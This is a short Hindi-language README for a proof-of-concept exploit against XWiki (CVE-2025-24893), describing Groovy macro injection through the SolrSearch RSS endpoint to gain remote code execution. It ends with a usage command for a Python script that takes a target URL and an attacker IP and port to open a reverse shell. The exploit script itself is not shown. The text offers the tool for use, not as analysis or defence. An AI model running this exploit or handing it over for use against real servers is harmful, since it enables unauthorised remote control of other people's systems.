
CVE-2025-24893 के लिए रिवर्स शेल पेलोड
CVE-2025-24893 के लिए PoC – XWiki
<groovy>मैक्रो दूरस्थ कोड निष्पादन
Artemir के मूल PoC से प्रेरित
यह CVE-2025-24893 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो XWiki के संवेदनशील संस्करणों में एक दूरस्थ कोड निष्पादन (RCE) कमजोरी है।
दोष SolrSearch एंडपॉइंट में उपयोगकर्ता इनपुट के अनुचित सैनिटाइजेशन में निहित है, जो RSS फ़ीड क्वेरी के माध्यम से अनसैंडबॉक्स्ड <groovy> मैक्रो इंजेक्शन के प्रति संवेदनशील है।
यह स्क्रिप्ट async मैक्रो का उपयोग करके एक Groovy पेलोड इंजेक्ट करती है जिसके परिणामस्वरूप सर्वर पर कमांड निष्पादन होता है, जिससे हमलावर अपने सिस्टम पर रिवर्स शेल शुरू कर सकता है।
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>